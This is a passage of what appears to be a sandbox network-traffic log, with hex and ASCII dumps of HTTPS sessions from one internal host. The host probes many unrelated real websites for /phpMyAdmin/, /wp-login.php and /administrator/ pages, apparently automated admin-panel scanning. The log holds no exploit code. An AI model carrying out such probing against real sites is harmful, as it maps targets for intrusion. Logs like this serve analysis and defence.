rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	60924	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:12 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	60905	208.109.43.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	179	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:12 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	60941	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	172	OUT	GET /wp-login.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:12 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	61051	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	240	OUT	GET /administrator/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/administrator/
2024-02-20 23:26:13 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:12 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:13 UTC	15975	IN	Data Raw: 37 45 35 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 7E5C<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:13 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:13 UTC	8177	IN	Data Raw: 33 0d 0a 32 43 37 30 30 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e Data Ascii: 32C700i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	61056	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	277	OUT	GET /administrator/index.php HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85s User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://eskimo.ch/administrator/
2024-02-20 23:26:12 UTC	357	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Pragma: no-cache Expires: Wed, 21 Feb 2024 00:26:12 GMT Cache-Control: max-age=3600 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://eskimo.ch/administrator/ Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	61563	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	175	OUT	GET /wp-login.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HyL9+RUhqWxb8N6qz+k07AjgobTExhfINPdENzVbYU7FfValCfV11AUo6nyFvwEw+DrSB4TKlMwvlCD7DwA+2Q Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:12 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	61402	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	349	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: https://www.glazing-bt.com Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	61477	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	182	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:13 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:13 UTC	15975	IN	Data Raw: 37 38 46 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 78F0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:13 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:13 UTC	8177	IN	Data Raw: 30 30 25 32 43 37 30 30 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e Data Ascii: 00%2C700i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	60234	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	172	OUT	GET /wp-login.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_G8FazbNxXFNJ0RKEV0ku/7PDY6VkqAK/koVZTwmwPjKpecSYwwcPCkmkEwGqjfInzzcSu10gAiRtg0OxuXfJ1w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:12 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	61602	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	735	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:13 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=mm2855pn5cueotnic4oa3bpkn6; expires=Fri, 10-Jun-2078 22:52:26 GMT; Max-Age=1713655573; path=/; secure; HttpOnly; SameSite=None access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 960709554 age: 0 transfer-encoding: chunked x-server: varnish-1 connection: close
2024-02-20 23:26:13 UTC	13761	IN	Data Raw: 33 35 42 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6f 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 20 4d 61 72 6b f8 72 65 6e 20 52 65 6b 6c 61 6d 65 20 41 53 20 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 35B9<!DOCTYPE html><html lang="no"><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title> Markren Reklame AS </title><meta name
2024-02-20 23:26:13 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 61 74 61 2d 66 69 6c 74 65 72 73 3d 22 74 72 75 65 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 73 6f 65 6b 22 20 69 64 3d 22 73 72 63 68 78 76 22 20 6e 61 6d 65 3d 22 78 76 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 76 61 6c 75 65 3d 22 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 f8 6b 20 62 6c 61 6e 64 74 20 31 30 30 30 2d 76 69 73 20 61 76 20 70 72 6f 64 75 6b 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 73 65 61 72 63 68 22 3e 0a 3c 73 70 61 Data Ascii: 5A8ata-filters="true"><input type="hidden" value="soek" id="srchxv" name="xv"><div class="input-group"><input type="text" value="" placeholder="Sk blandt 1000-vis av produkter" class="form-control" autocomplete="off" id="search" name="search"><spa
